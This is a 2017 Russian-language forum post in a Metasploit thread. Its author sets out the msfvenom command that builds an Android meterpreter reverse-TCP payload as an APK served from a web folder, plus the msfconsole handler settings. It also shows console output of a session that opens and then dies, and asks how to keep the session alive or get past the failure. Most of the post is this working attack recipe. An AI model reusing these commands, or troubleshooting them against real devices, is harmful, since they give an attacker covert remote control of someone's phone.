Тема: Metasploit
Показать сообщение отдельно

  #5  
Старый 05.01.2017, 00:57
Fujiko Mine
Познающий
Регистрация: 03.11.2015
Сообщений: 40
Провел на форуме:
7695

Репутация: 0
По умолчанию

в общем вроде делаю всё по сценарию:

ОС Kali 2

мой_ip=192.168.0.103

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 R > /var/www/shell.apk

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 8080

exploit

собственно потом вижу это:
[*] Started reverse TCP handler on 192.168.0.103:8080
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (192.168.0.103:8080 -> 192.168.0.100:54636) at 2017-01-04 15:46:03 +0000
[*] 192.168.0.100 - Meterpreter session 1 closed. Reason: Died

[-] Invalid session identifier: 1

интересны возможные причины и способы их обойти/устранить
 
Ответить с цитированием